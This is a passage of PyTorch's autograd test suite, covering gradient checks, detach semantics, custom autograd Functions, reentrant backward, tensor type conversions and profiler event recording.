self._test_setitem((1,), Variable(mask[0, 0:1]))
self._test_setitem_tensor((5, 5), Variable(mask))
self._test_setitem_tensor((5,), Variable(mask[0]))
def test_select_sum(self):
# both select and sum return Scalars in ATen; ensure they work together.
x = torch.randn(10, dtype=torch.double, requires_grad=True)
def func(x):
return x.select(0, 1).sum()
gradcheck(func, [x])
gradgradcheck(func, [x])
def test_diagonal_expanded_v(self):
value = torch.rand([])
v_expanded = torch.tensor(value).expand(10)
a = torch.rand(10, 10, dtype=torch.double, requires_grad=True)
result, = torch.autograd.grad(a.diagonal(), a, v_expanded)
self.assertEqual(result, torch.eye(10, dtype=torch.double) * value)
def test_select_expanded_v(self):
v_expanded = torch.rand(10).expand(10, 10)
a = torch.rand(10, 10, 10, requires_grad=True)
result, = torch.autograd.grad(a[0], a, v_expanded)
expected = torch.zeros(10, 10, 10)
expected[0] = v_expanded
self.assertEqual(result, expected)
def test_slice_expanded_v(self):
v_expanded = torch.rand(10, 1).expand(2, 10, 10)
a = torch.rand(10, 10, 10, requires_grad=True)
result, = torch.autograd.grad(a[3:5], a, v_expanded)
expected = torch.zeros(10, 10, 10)
expected[3:5] = v_expanded
self.assertEqual(result, expected)
def test_unused_output(self):
x = torch.randn(10, 10, requires_grad=True)
outputs = x.chunk(5)
o = outputs[2]
o = o * 4 + 2
o.sum().backward()
expected_grad = torch.zeros(10, 10)
expected_grad[4:6] = 4
self.assertEqual(x.grad, expected_grad)
with torch.no_grad():
x.grad.zero_()
grad_output = torch.randn(2, 10)
outputs = x.chunk(5)
outputs[0].backward(grad_output)
expected_grad = torch.zeros(10, 10)
expected_grad[:2] = grad_output
self.assertEqual(x.grad, expected_grad)
# TODO: opinfo this or move to the sparse test suite
def _test_sparse_gather(self, size_x, size_ind, dim):
x = torch.randn(size_x, requires_grad=True)
if len(size_ind) > 0 and len(size_x) > 0:
ind = torch.randint(x.size(dim), size_ind)
else:
ind = torch.zeros(size_ind, dtype=torch.int64)
out = torch.gather(x, dim, ind, sparse_grad=False)
grad = torch.rand_like(out)
out.backward(grad)
grad_dense = x.grad.clone()
x.grad = None
out = torch.gather(x, dim, ind, sparse_grad=True)
out.backward(grad)
self.assertEqual(grad_dense, x.grad.to_dense())
def test_sparse_gather_dim0(self):
self._test_sparse_gather((10, 10), (5, 10), 0)
def test_sparse_gather_dim1(self):
self._test_sparse_gather((10, 10, 5), (10, 5, 5), 1)
def test_sparse_gather_dim_neg(self):
self._test_sparse_gather((10, 10, 5), (10, 10, 2), -1)
def test_sparse_gather_ind_scalar(self):
self._test_sparse_gather((10,), (), 0)
def test_sparse_gather_x_scalar(self):
self._test_sparse_gather((), (2,), 0)
def test_sparse_gather_both_scalar(self):
self._test_sparse_gather((), (), 0)
def test_gc_in_destructor(self):
"""
Previously, if a Function destructor triggered a garbage collection,
the Variable's tp_dealloc handler would get called twice leading to a
segfault.
"""
class CollectOnDelete(Function):
def forward(self, x):
return x
def backward(self, grad_output):
return grad_output
def __del__(self):
gc.collect()
for _ in range(10):
CollectOnDelete().forward(torch.randn(1, requires_grad=True)).backward()
def test_naughty_autograd_function_attribute_access(self):
class Id(Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, grad_x):
return grad_x
with self.assertWarnsRegex(DeprecationWarning, "should not be instantiated"):
f = Id()
# # After raising warning, should still return an instance
self.assertIsInstance(f, Id)
x = torch.zeros(1, requires_grad=True)
with self.assertRaisesRegex(RuntimeError, "non-static forward method is deprecated"):
f(x)
t = Id.apply(x)
self.assertEqual(t.grad_fn.name(), "IdBackward")
# THPFunction is the base class of both grad_fn and autograd functions,
# which means that a lot of accessors on them may segfault. Test that we
# properly error in this case.
t = torch.ones(1, requires_grad=True)
t._backward_hooks = dict()
with self.assertRaisesRegex(RuntimeError, "Attribute '_register_hook_dict' is invalid"):
f._register_hook_dict(t)
with self.assertRaisesRegex(RuntimeError, "Attribute 'register_hook' is invalid"):
f.register_hook(lambda x, y: None)
with self.assertRaisesRegex(RuntimeError, "Attribute 'next_functions' is invalid"):
f.next_functions
with self.assertRaisesRegex(RuntimeError, "Attribute 'name' is invalid"):
f.name()
with self.assertRaisesRegex(RuntimeError, "underlying PyNode has already been deallocated"):
f.metadata
@unittest.expectedFailure
def test_naughty_anomaly_access(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, g):
return g
x = torch.zeros(1, requires_grad=True)
y = MyFunction.apply(x)
y.backward()
y.grad_fn.metadata
g = y.grad_fn
del y
g.metadata # this currently fails, but shouldn't
def test_naughty_autograd_function_stashing_ctx(self):
saved_ctx = []
class Id(Function):
@staticmethod
def forward(ctx, x):
ctx.save_for_backward(x)
return x
@staticmethod
def backward(ctx, grad_x):
saved_ctx.append(ctx)
return ctx.saved_tensors
p = torch.zeros(1, requires_grad=True)
loss = Id.apply(p)
loss.backward(retain_graph=True)
del loss
# At this point in time, it complains that the graph has been freed
# (which indeed true, although a somewhat indirect way of stating the
# problem).
self.assertRaises(RuntimeError, lambda: saved_ctx[0].saved_tensors)
def test_custom_autograd_repeated_grad_grad(self):
# This test failed the equality check in PR #22983; it's an interesting
# and different test case worth enshrining. mult1 is not testing
# anything that interesting, but mult2 is the interesting case.
def mult1(x):
return x.prod(dim=-1).prod(dim=-1)
class Mult(torch.autograd.Function):
@staticmethod
def forward(ctx, x):
y = mult1(x)
ctx.save_for_backward(x, y)
return y
@staticmethod
def backward(ctx, grad_output):
x, y = ctx.saved_tensors
return (grad_output * y)[:, None, None] / x
mult2 = Mult.apply
def check_gradgrad_repeated(x, y):
gy, = torch.autograd.grad(y[0], x, create_graph=True)
ggy_1, = torch.autograd.grad(gy[0, 0, 0], x, retain_graph=True)
gy, = torch.autograd.grad(y[0], x, create_graph=True)
ggy_2, = torch.autograd.grad(gy[0, 0, 0], x, retain_graph=True)
self.assertEqual(ggy_1[0, 0, 1], ggy_2[0, 0, 1])
x = torch.ones(2, 4, 4).requires_grad_()
check_gradgrad_repeated(x, mult1(x))
check_gradgrad_repeated(x, mult2(x))
def test_custom_autograd_no_early_free(self):
# This test failed complaining that buffers had already been freed
# prior to #22983. Also pretty interesting test case.
class Double(torch.autograd.Function):
@staticmethod
def forward(ctx, x):
y = x ** 2
ctx.save_for_backward(x, y)
return y
@staticmethod
def backward(ctx, grad_output):
x, _ = ctx.saved_tensors
return grad_output * 2 * x
# this is equivalent, but uses the output of .forward() in .backward()
class Double2(Double):
@staticmethod
def backward(ctx, grad_output):
x, y = ctx.saved_tensors
return grad_output * 2 * y / x
double = Double.apply
double2 = Double2.apply
x = torch.tensor(2).double().requires_grad_()
self.assertTrue(gradcheck(double, x))
self.assertTrue(gradgradcheck(double, x))
self.assertTrue(gradcheck(double2, x))
self.assertTrue(gradgradcheck(double2, x))
y = double(x)
torch.autograd.grad(y, x, create_graph=True)
torch.autograd.grad(y, x)
y = double2(x)
torch.autograd.grad(y, x, create_graph=True)
torch.autograd.grad(y, x) # should not error!
def test_detach(self):
x = torch.randn(10, 10, requires_grad=True)
y = x + 2
y = y.detach()
z = y * 4 + 2
self.assertFalse(y.requires_grad)
self.assertFalse(z.requires_grad)
x = torch.randn(10, 10, requires_grad=True)
y = x * 2
y = y.detach()
self.assertFalse(y.requires_grad)
self.assertIsNone(y.grad_fn)
z = x + y
z.sum().backward()
# This is an incorrect gradient, but we assume that's what the user
# wanted. detach() is an advanced option.
self.assertEqual(x.grad, torch.ones(10, 10))
# in-place detach
x = torch.randn(10, 10, requires_grad=True)
y = torch.randn(10, 10, requires_grad=True)
a = x * 2
(y + a).sum().backward(retain_graph=True)
a.detach_()
self.assertFalse(a.requires_grad)
(y + a).sum().backward() # this won't backprop to x
self.assertEqual(x.grad, torch.ones(10, 10) * 2)
self.assertEqual(y.grad, torch.ones(10, 10) * 2)
# in-place deatch on a view raises an exception
view = x.narrow(0, 1, 4)
self.assertRaisesRegex(RuntimeError, 'view', lambda: view.detach_())
def test_detach_base(self):
"detaching base does not detach view"
x = torch.randn(10, 10, requires_grad=True)
view = x.narrow(0, 1, 4)
x.detach_()
self.assertFalse(x.requires_grad)
self.assertTrue(view.requires_grad)
self.assertIsNotNone(view.grad_fn)
self.assertIs(view._base, x)
def _test_type_conversion_backward(self, t, ):
fvar = Variable(t(torch.randn(5, 5).float()), requires_grad=True)
fvar.double().sum().backward()
self.assertEqual(fvar.grad, torch.ones_like(fvar))
self.assertEqual(type(fvar.grad), type(fvar))
dvar = Variable(t(torch.randn(5, 5).double()), requires_grad=True)
dvar.float().sum().backward()
self.assertEqual(dvar.grad, torch.ones_like(dvar))
self.assertEqual(type(dvar.grad), type(dvar))
def test_type_conversions(self):
x = torch.randn(5, 5)
self.assertIsInstance(x.float(), torch.FloatTensor)
self.assertIsInstance(x.int(), torch.IntTensor)
if torch.cuda.is_available():
self.assertIsInstance(x.float().cuda(), torch.cuda.FloatTensor)
self.assertIsInstance(x.int().cuda(), torch.cuda.IntTensor)
self.assertIsInstance(x.int().cuda().cpu(), torch.IntTensor)
if torch.cuda.device_count() >= 2:
x2 = x.float().cuda(1)
self.assertIsInstance(x2, torch.cuda.FloatTensor)
self.assertIs(x2.get_device(), 1)
x2 = x.float().cuda()
self.assertIsInstance(x2, torch.cuda.FloatTensor)
self.assertIs(x2.get_device(), 0)
x2 = x2.cuda(1)
self.assertIsInstance(x2, torch.cuda.FloatTensor)
self.assertIs(x2.get_device(), 1)
y = Variable(torch.randn(5).cuda(1), requires_grad=True)
y.cpu().sum().backward()
self.assertIs(y.grad.get_device(), 1)
self.assertIs(y.long().get_device(), 1)
for t in [torch.DoubleTensor, torch.FloatTensor, torch.IntTensor, torch.ByteTensor]:
for y_var in (True, False):
y = torch.randint(5, (5, 5), dtype=t.dtype)
y = Variable(y) if y_var else y
self.assertIsInstance(x.type(t), t)
self.assertIsInstance(x.type_as(y), t)
# TODO: t.dtype should work
t_dtype = t().dtype
self.assertIsInstance(x.type(t_dtype), t)
self.assertIs(t_dtype, x.type(t_dtype).dtype)
self.assertEqual(y.data_ptr(), y.type(t).data_ptr())
if torch.cuda.is_available():
for x_cuda in (True, False):
for y_cuda in (True, False):
x_c = x.cuda() if x_cuda else x
y_c = y.cuda() if y_cuda else y
_, y_type = y_c.type().rsplit('.', 1)
y_typestr = ('torch.cuda.' if y_cuda else 'torch.') + y_type
self.assertEqual(y_c.type(), x_c.type(y_typestr).type())
self.assertIs(y_c.dtype, x_c.type(y_c.dtype).dtype)
self.assertEqual(y_c.data_ptr(), y_c.cuda().data_ptr() if y_cuda else y_c.data_ptr())
self._test_type_conversion_backward(lambda x: x)
if torch.cuda.is_available():
self._test_type_conversion_backward(lambda x: x.cuda())
if torch.cuda.device_count() >= 2:
# one of these has to be the non-default device
self._test_type_conversion_backward(lambda x: x.cuda(0))
self._test_type_conversion_backward(lambda x: x.cuda(1))
def test_isolated_node(self):
x = torch.randn(5, 5, requires_grad=True)
y = torch.randn(5, 5, requires_grad=True)
a = x + y
b = torch.max(a, 1, True)[1].repeat(1, 5).double()
o = (b + a).sum()
o.backward()
def test_shape(self):
x = torch.randn(3, 4)
self.assertEqual(2, len(x.shape))
self.assertEqual(x.shape[0], 3)
self.assertEqual(x.shape[1], 4)
def test_numpy_requires_grad(self):
x = torch.randn(2, 2, requires_grad=True)
err_msg_outputs = r"Can't call numpy\(\) on Tensor that requires grad. Use tensor.detach\(\).numpy\(\) instead."
with self.assertRaisesRegex(RuntimeError, err_msg_outputs):
x.numpy()
with torch.no_grad():
x.numpy()
x = torch.randn(2, 2)
x.numpy()
with torch.no_grad():
x.numpy()
def test_return_leaf(self):
class Identity(Function):
@staticmethod
def forward(ctx, a, b):
return a, a + b
@staticmethod
def backward(ctx, grad_a, grad_b):
return grad_a + grad_b, grad_b
hook_called = [False]
x = torch.randn(5, 5, requires_grad=True)
y = torch.randn(5, 5, requires_grad=True)
q, p = Identity.apply(x, y)
# Make sure hooks only receive grad from usage of q, not x.
def hook(grad):
hook_called[0] = True
self.assertEqual(grad, torch.ones(5, 5))
q.register_hook(hook)
(q + p + x).sum().backward()
self.assertEqual(x.grad, torch.ones(5, 5) * 3)
self.assertEqual(y.grad, torch.ones(5, 5))
self.assertTrue(hook_called[0])
def test_return_leaf_inplace(self):
class Inplace(InplaceFunction):
@staticmethod
def forward(ctx, a, b):
ctx.mark_dirty(a)
return a.add_(b), b + 2
@staticmethod
def backward(ctx, grad_a, grad_b):
return grad_a, grad_a + grad_b
x = torch.randn(5, 5)
y = torch.randn(5, 5, requires_grad=True)
q, p = Inplace.apply(x, y)
self.assertIs(q, x)
self.assertIs(q.grad_fn.__class__, Inplace._backward_cls)
self.assertTrue(q.requires_grad)
q.sum().backward()
self.assertEqual(y.grad, torch.ones(5, 5))
def test_leaf_assignment(self):
x = torch.randn(5, 5)
y = torch.randn(5, requires_grad=True)
z = torch.randn(5, requires_grad=True)
x[0] = y
x[1] = 2 * z
self.assertTrue(x.requires_grad)
self.assertIsNot(x.grad_fn, None)
x.sum().backward()
self.assertEqual(y.grad, torch.ones(5))
self.assertEqual(z.grad, torch.ones(5) * 2)
def test_no_grad_assignment(self):
x = torch.randn(5, 5, requires_grad=True)
y = torch.randn(5)
with torch.no_grad():
x[0] = y
self.assertTrue(x.requires_grad)
self.assertIsNone(x.grad_fn)
def test_no_grad_modifies_version(self):
x = torch.randn(5, requires_grad=True)
y = torch.randn(5, requires_grad=True)
z = (x * y).sum()
with torch.no_grad():
x *= 2
self.assertRaisesRegex(RuntimeError, 'modified by an inplace operation',
lambda: z.backward())
def test_no_grad_input(self):
class MyFunction(Function):
@staticmethod
def forward(self, x):
return x
@staticmethod
def backward(self, grad_output):
return grad_output
x = torch.randn(5, requires_grad=True)
with torch.no_grad():
y = MyFunction.apply(x)
self.assertTrue(x.requires_grad)
self.assertIsNone(y.grad_fn)
def test_backward_copy(self):
# This tests checks backward engine for a very subtle bug that appreared
# in one of the initial versions of autograd. Gradients tensors were
# simply stored in lists while the function waited for all its gradients
# to be computed. However, sometimes an output was used multiple times,
# so the gradients needed to be summed. Engine used to keep a need_copy
# set of tensors that will need a clone upon next addition and removed
# them from the set as soon as the clone was performed. However, this
# could lead to incorrect results if the same gradient tensor was
# buffered in three places in the graph:
# 1. When accumulating gradients in one of these places it was cloned
# and removed from need_copy set.
# 2. When accumulating in second place, it wasn't in the need_copy set,
# so the gradients were simply accumulated in-place (which already
# modified the grad in 3rd place)
# 3. When accumulating in the third place, it wasn't in the need_copy set
# as well, so the incoming gradient was summed in-place, yielding
# incorrect results in all functions, except the first one.
x = torch.ones(5, 5, requires_grad=True)
y = torch.ones(5, 5, requires_grad=True)
# Simulate that we're in the middle of the graph
a = x + 2
b = y + 2
c = x + 2
# This op will just return grad_output two times in backward
add1 = a + b
add2 = add1 + c
# Simulate a long branch, so grad_output will get buffered.
for _ in range(4):
a = a * 2
b = b * 2
c = c * 2
branch = a + b + c
out = add2 + branch
# expected gradients are:
# for x: 34 (16 from final a, 16 from final c, 2 from add2)
# for y: 17 (16 from final b, 1 from add2)
grad_output = torch.ones(5, 5)
out.backward(grad_output)
self.assertEqual(x.grad, torch.ones(5, 5) * 34)
self.assertEqual(y.grad, torch.ones(5, 5) * 17)
def test_save_none_for_backward(self):
test_case = self
class MyFn(Function):
@staticmethod
def forward(ctx, input):
ctx.save_for_backward(None, input, None)
return input * input
@staticmethod
def backward(ctx, grad_output):
n1, input, n2 = ctx.saved_tensors
test_case.assertIsNone(n1)
test_case.assertIsNone(n2)
return 2 * input * grad_output
x = torch.randn(5, 5, requires_grad=True)
y = MyFn.apply(x)
y.sum().backward()
self.assertEqual(x.grad, 2 * x)
def test_too_many_grads(self):
class MyFn(Function):
@staticmethod
def forward(ctx, input):
return input
@staticmethod
def backward(ctx, grad_output):
return grad_output, None, None
x = torch.randn(5, 5, requires_grad=True)
y = MyFn.apply(x)
y.sum().backward()
self.assertEqual(x.grad, torch.ones_like(x))
def test_pickle(self):
x = torch.randn(10, 10, requires_grad=True)
y = torch.randn(10, 10, requires_grad=False)
def assert_strict_equal(var1, var2):
self.assertEqual(var1, var2)
self.assertEqual(var1.requires_grad, var2.requires_grad)
serialized = [pickle.dumps([x, y], protocol=p) for p in range(3)]
for dump in serialized:
xc, yc = pickle.loads(dump)
assert_strict_equal(xc, x)
assert_strict_equal(yc, y)
def test_dep_nograd(self):
class F1(Function):
@staticmethod
def forward(ctx, input):
out = torch.randn(input.size())
ctx.mark_non_differentiable(out)
return input, out
@staticmethod
def backward(ctx, grad_output, ignored):
return grad_output
class F2(Function):
@staticmethod
def forward(ctx, input, ignored):
return input
@staticmethod
def backward(ctx, grad_output):
return grad_output, None
x = torch.randn(5, requires_grad=True)
a, b = F1.apply(x)
b = b + 1 # separate F1 from F2 by another op
self.assertTrue(a.requires_grad)
self.assertFalse(b.requires_grad)
c = F2.apply(a, b)
c.backward(torch.ones(c.size()))
self.assertEqual(x.grad, torch.ones(x.size()))
def test_set_grad_enabled(self):
x = torch.tensor([1.], requires_grad=True)
with torch.set_grad_enabled(False):
y = x * 2
self.assertFalse(y.requires_grad)
with torch.set_grad_enabled(True):
y = x * 2
self.assertTrue(y.requires_grad)
with torch.set_grad_enabled(False):
torch.set_grad_enabled(True)
y = x * 2
self.assertTrue(y.requires_grad)
def test_simple_reentrant(self):
y_data = torch.randn(2, 2)
class Reenter(Function):
@staticmethod
def forward(ctx, x):
with torch.enable_grad():
ctx.x = Variable(x, requires_grad=True)
ctx.y = Variable(y_data, requires_grad=True)
ctx.output_var = ctx.x * ctx.y
return ctx.output_var.detach()
@staticmethod
def backward(ctx, grad_output):
with torch.enable_grad():
ctx.output_var.sum().backward()
return ctx.x.grad * grad_output
# Reentrant starts on CPU thread, finishs on GPU thread
x = torch.randn(2, 2, requires_grad=True)
out = Reenter.apply(x)
out.sum().backward()
self.assertEqual(x.grad, y_data)
def test_reentrant_child_error(self):
# Parent graph.
a = torch.rand(3, 3, requires_grad=True)
c = a * a
# Reentrant child graph.
b = torch.rand(3, 3, requires_grad=True)
e = b * b
f = TestAutograd.SimulateBackwardError.apply(e)
reentrant_root = f.sum()
class ReentrantFunc(Function):
@staticmethod
def forward(ctx, inp):
return inp.clone()
@staticmethod
def backward(ctx, grad):
# Reentrant backward in child will throw an error.
reentrant_root.backward()
return grad
d = ReentrantFunc.apply(c)
with self.assertRaisesRegex(Exception, 'Simulate error'):
d.sum().backward()
def test_var_mean_differentiable(self):
dim = [2, 4]
keepdim = False
input1 = torch.randn(3, 4, 5, 6, 2, 3, requires_grad=True)
input2 = deepcopy(input1)
var1, mean1 = torch.var_mean(input1, dim=dim, keepdim=keepdim)
var2 = input2.var(dim=dim, keepdim=keepdim)
mean2 = input2.mean(dim=dim, keepdim=keepdim)
grad = torch.randn(3, 4, 6, 3, requires_grad=True)
r1 = var1 * var1 * mean1 * mean1
r2 = var2 * var2 * mean2 * mean2
self.assertEqual(r1, r2, rtol=0.01, atol=0.0)
torch.autograd.backward(r1, grad)
torch.autograd.backward(r2, grad)
self.assertEqual(input1.grad, input2.grad, rtol=0.01, atol=0.0)
@skipIfNoLapack
def test_lobpcg(self):
def func(k, A, largest=True, B=None):
X_shape = list(A.shape)
X_shape[-1] = k
X = torch.eye(A.size(-2), k, dtype=A.dtype, device=A.device)
if A.dim() > 2:
X = X.expand(X_shape)
D, U = torch.lobpcg(A=A, k=k, B=B, X=X, largest=largest)
# LOBPCG uses a random initial eigenspace approximation
# if parameter `X` is not provided.
# This may cause a non-deterministic behavior
# when it comes to the sign of an eigenvector
# (note if v is an eigenvector, so is -v),
# hence we eliminate this non-determinism
# by making sure that each column of U
# gets multiplied by the sign of its max (in absolute value) element.
# Also, gradcheck changes the content of the input by +/- eps (default to 1e-06)
# to compute the numerical gradient which can also cause the signs to flip.
_, idx = U.abs().max(-2, keepdim=True)
sign = U.gather(-2, idx).sign()
U = U * sign
return D, U
# TODO: review if this can be ported to OpInfos or moved to test_linalg.py
def run_symeig_test(k, sizes, largest=True):
A = torch.rand(*sizes).double()
A = (A @ A.mT) / 10
A.requires_grad_(True)
gradcheck(lambda A: func(k, A, largest), A, check_batched_grad=False)
# Custom gradient vectors for better stability due to some
# non-determinism in the lobpcg's forward.
# Note it is not required if symeig is in forward instead (tested).
D_grad = torch.rand(*A.shape[:-2], k) / 100
U_grad = torch.rand(*A.shape[:-1], k) / 100
gradgradcheck(lambda A: func(k, A, largest), A, [D_grad, U_grad], atol=1e-4, check_batched_grad=False)
# check whether A.grad is symmetric
A = A.detach().requires_grad_(True)
D, U = func(k, A, largest)
(D.sum() + U.sum()).backward()
self.assertEqual(A.grad, A.grad.mT)
for largest in [True, False]:
run_symeig_test(1, (6, 6), largest=largest)
run_symeig_test(1, (2, 6, 6), largest=largest)
run_symeig_test(1, (2, 2, 6, 6), largest=largest)
run_symeig_test(2, (6, 6), largest=largest)
run_symeig_test(2, (2, 6, 6), largest=largest)
run_symeig_test(2, (2, 2, 6, 6), largest=largest)
run_symeig_test(3, (9, 9), largest=largest)
run_symeig_test(3, (2, 9, 9), largest=largest)
run_symeig_test(3, (2, 2, 9, 9), largest=largest)
def test_variable_traverse(self):
def get_out_and_unrefed_cycle():
inp = torch.randn(10, requires_grad=True)
tmp = inp.view(10, 1)
out = tmp.view(10)
# Create a reference cycle that contains an
# intermediary Variable in the graph
my_list = []
my_list.append(tmp)
my_list.append(my_list)
return out
out = get_out_and_unrefed_cycle()
gc.collect()
# This will segfault if things have been erroneously released
out.backward(torch.randn(out.size()))
# TODO: review porting these to OpInfo tests
def test_pow_zero_tensor_gradient(self):
def run_test(input_size, exponent):
input = torch.zeros(*input_size, requires_grad=True)
input.pow(exponent).sum().backward()
self.assertEqual(input.grad.abs().sum(), 0)
run_test((10,), torch.zeros(10))
run_test((10, 10), torch.zeros(10, 10))
run_test((10,), 0)
def test_profiler(self):
x = torch.randn(10, 10)
with profile(use_kineto=kineto_available()) as p:
self.assertTrue(torch.autograd._profiler_enabled())
y = x * 2 + 4
self.assertFalse(torch.autograd._profiler_enabled())
names = ['aten::mul', 'aten::add']
found_indices = set()
for evt in p.function_events:
if evt.name in names:
found_indices.add(names.index(evt.name))
self.assertEquals(len(found_indices), len(names))
def test_profiler_seq_nr(self):
with profile(use_kineto=kineto_available()) as p:
x = torch.randn(10, 10, requires_grad=True)
y = torch.randn(10, 10, requires_grad=True)
z = x + y
s = z.sum()
s.backward()
print(p.key_averages().table(
sort_by="self_cpu_time_total", row_limit=-1))
# expecting aten::add, aten::sum to have the sequence numbers,
# expecting the corresponding backward nodes to have the same numbers
# as the forward ops
add_seq_nr = -1
sum_seq_nr = -1
found_add = found_sum = False
found_bwd_add = found_bwd_sum = False
found_empty = False
for e in p.function_events:
# Ignore record_function user scope.
if "autograd::engine::evaluate_function" in e.name:
continue
if e.name == "aten::add":
add_seq_nr = e.sequence_nr
self.assertFalse(found_add)
found_add = True
elif e.name == "aten::sum":
sum_seq_nr = e.sequence_nr
self.assertFalse(found_sum)
found_sum = True
elif "Add" in e.name and "Backward" in e.name:
self.assertEqual(e.sequence_nr, add_seq_nr)
self.assertFalse(found_bwd_add)
found_bwd_add = True
elif "Sum" in e.name and "Backward" in e.name:
self.assertEqual(e.sequence_nr, sum_seq_nr)
self.assertFalse(found_bwd_sum)
found_bwd_sum = True
# check that nested ops (e.g. empty) don't have
# sequence number
if e.name == "aten::empty":
self.assertEqual(e.sequence_nr, -1)
found_empty = True
self.assertGreaterEqual(add_seq_nr, 0)
self.assertGreaterEqual(sum_seq_nr, 0)
self.assertNotEqual(add_seq_nr, sum_seq_nr)
self.assertTrue(found_add)
self.assertTrue(found_sum)
self.assertTrue(found_bwd_add)
self.assertTrue(found_bwd_sum)
self.assertTrue(found_empty)
def test_profiler_unboxed_only(self):
x = torch.rand(3, 4)
with torch.autograd.profiler.profile(use_kineto=kineto_available()) as prof:
x.resize_([3, 2])
def test_profiler_propagation(self):
def foo(x):
with record_function("in_foo") as rf:
return x * 2
x = torch.rand(3, 4)
traced_foo = torch.jit.trace(foo, x)
def bar(x):
with record_function("in_bar") as rf:
# we expect that profiler will be able
# propagate across fork
fut = torch.jit._fork(traced_foo, x)
y = torch.jit._wait(fut)
# note: continuation (and rf's end) can
# be executed in a different thread
with record_function("in_bar_after_wait") as rf2:
y = y * 2
return y
traced_bar = torch.jit.trace(bar, x)
with profile(use_kineto=kineto_available()) as p:
traced_bar(x)
found_foo = False
found_bar = False
found_bar_after_wait = False
for info in p.function_events:
if info.name == "in_foo":
self.assertFalse(found_foo)
found_foo = True
elif info.name == "in_bar":
self.assertFalse(found_bar)
found_bar = True
elif info.name == "in_bar_after_wait":
self.assertFalse(found_bar_after_wait)
found_bar_after_wait = True
self.assertTrue(found_foo)
self.assertTrue(found_bar)
self.assertTrue(found_bar_after_wait)
def test_record_function_callbacks(self):
x = torch.randn(10, 10)
with profile(use_kineto=kineto_available()) as p:
with record_function("foo"):
y = x * 2 + 4
function_events = p.function_events
foo_event = [event for event in function_events if "foo" in event.name][0]
self.assertEqual(foo_event.count, 1)
def test_profiler_aggregation_fake(self):
events = EventList()
id = [0]
def get_id():
id[0] = id[0] + 1
return id[0]
# [[thread_id, [(start, end, id), ....]], ...]
# Using list instead of a dict so order is guaranteed for any Python
# version
threads = [
[1, [(0, 1, get_id()), (1, 2, get_id())]],
[0, [(0, 2, get_id()), (1, 2, get_id()), (1, 3, get_id())]],
]
for thread, ranges in threads:
for range in ranges:
assert(len(range) == 3)
events.append(
FunctionEvent(
id=range[2],
node_id=0,
name="",
thread=thread,
start_us=range[0],
end_us=range[1],
)
)
events._populate_cpu_children()
# Note that [1, 3] pushes out [0, 2] first. Then we record [1, 2]
# as a child of [1, 3]
res = [[], [], [], [], [4]]
def get_children_ids(event):
return [child.id for child in event.cpu_children]
assert([get_children_ids(event) for event in events] == res)
def test_profiler_aggregation_table(self):
"""
Test if the profiling result is aggregated for `str(prof)`
See: https://github.com/pytorch/pytorch/issues/37500
"""
x = torch.randn(1024)
with torch.autograd.profiler.profile(use_kineto=kineto_available()) as prof:
torch.einsum("i->", x)
prof_str = str(prof)
prof_table = prof.table()
self.assertEqual(prof_table, prof_str)
def test_profiler_function_event_avg(self):
avg = FunctionEventAvg()
avg.add(FunctionEvent(id=0, node_id=0, name="foo", thread=0, start_us=10, end_us=15))
avg.add(FunctionEvent(id=1, node_id=0, name="foo", thread=0, start_us=20, end_us=30))
avg.add(avg)
self.assertEqual(avg.key, "foo")
# aggregate stats
self.assertEqual(avg.count, 4)
self.assertEqual(avg.cpu_time_total, 30)
self.assertEqual(avg.self_cpu_time_total, 30)
self.assertEqual(avg.cuda_time_total, 0)
# average stats
self.assertEqual(avg.cpu_time, 7.5)
self.assertEqual(avg.cuda_time_total, 0)
def test_profiler_shapes(self):
print("")
layer1 = torch.nn.Linear(20, 30)
layer2 = torch.nn.Linear(30, 40)
input = torch.randn(128, 20)
with profile(record_shapes=True, use_kineto=kineto_available()) as prof:
layer2(layer1(input))
print(prof.function_events)
linear_expected_shapes = [
[[128, 20], [30, 20], [30]],
[[128, 30], [40, 30], [40]],
]
found_indices = set()
for event in prof.function_events:
if event.name == "aten::linear":
self.assertTrue(event.input_shapes in linear_expected_shapes)
found_indices.add(linear_expected_shapes.index(event.input_shapes))
self.assertEqual(len(found_indices), len(linear_expected_shapes))
def test_profiler_aggregation_lstm(self):
print("")
rnn = torch.nn.LSTM(10, 20, 2)
total_time_s = 0
with profile(record_shapes=True, use_kineto=kineto_available()) as prof:
for i in range(20):
input = torch.randn(5, 3, 10)
h = torch.randn(2, 3, 20)
c = torch.randn(2, 3, 20)
start = time.time()
rnn(input, (h, c))
end = time.time()
total_time_s += end - start
print(prof.table(
sort_by="self_cpu_time_total", row_limit=10, header="TEST"))
print(prof.key_averages(group_by_input_shape=True).table(
sort_by="self_cpu_time_total", row_limit=10))
print(prof.table(
sort_by="self_cpu_time_total", row_limit=10, max_src_column_width=300, header="TEST", top_level_events_only=True))
print(prof.key_averages(group_by_input_shape=True).table(
sort_by="self_cpu_time_total", row_limit=10, top_level_events_only=True))
total_time_us = total_time_s * 1000.0 * 1000.0 # make it us which is profiler default
print(
"Total time based on python measurements: ",
_format_time(total_time_us)
)
print(
"CPU time measurement python side overhead: {:.2f}%".format(
(total_time_us / prof.self_cpu_time_total - 1.0) * 100.0
)
)
if sys.platform != "win32":
with tempfile.NamedTemporaryFile() as trace_file:
prof.export_chrome_trace(trace_file.name)
def test_record_function(self):
x = torch.randn(10, 10)
def forward(x):
with record_function("outer"):
y = x * 2 + 4
with record_function("inner"):
y = y - 1
y = y / 1
forward(x)
with profile(use_kineto=kineto_available()) as p:
forward(x)
events = p.function_events
important_events = [
'outer',
'aten::mul',
'aten::add',
'inner',
'aten::sub',
'aten::div'
]
idx = 0
for info in events:
if info.name == important_events[idx]:
idx = idx + 1
if idx == len(important_events):
break
self.assertEqual(idx, len(important_events))
# We can also use record_function to decorate arbitrary function
@record_function('my_func')
def f(x, y):
return x + y
with profile(use_kineto=kineto_available()) as p:
f(1, 2)
self.assertTrue('my_func' in str(p))
def test_record_function_multithreaded(self):
rf = record_function("outer")
rf.__enter__()
with record_function("inner"):
# test that exiting the record function after starting another one
# doesn't throw.
rf.__exit__(None, None, None)
with record_function("inner"):
rf.__enter__()
# test that exiting the record function after ending another one
# doesn't throw.
rf.__exit__(None, None, None)
def test_dir(self):
x = torch.randn(10, 10)
keys = dir(x)
self.assertIn('shape', keys)
# real and imag are only implemented for complex tensors.
y = torch.randn(10, 10, dtype=torch.cfloat)
for key in ['real', 'imag']:
self.assertRaises(RuntimeError, lambda: hasattr(x, key))
self.assertTrue(hasattr(y, key))
keys.remove(key)
for key in keys:
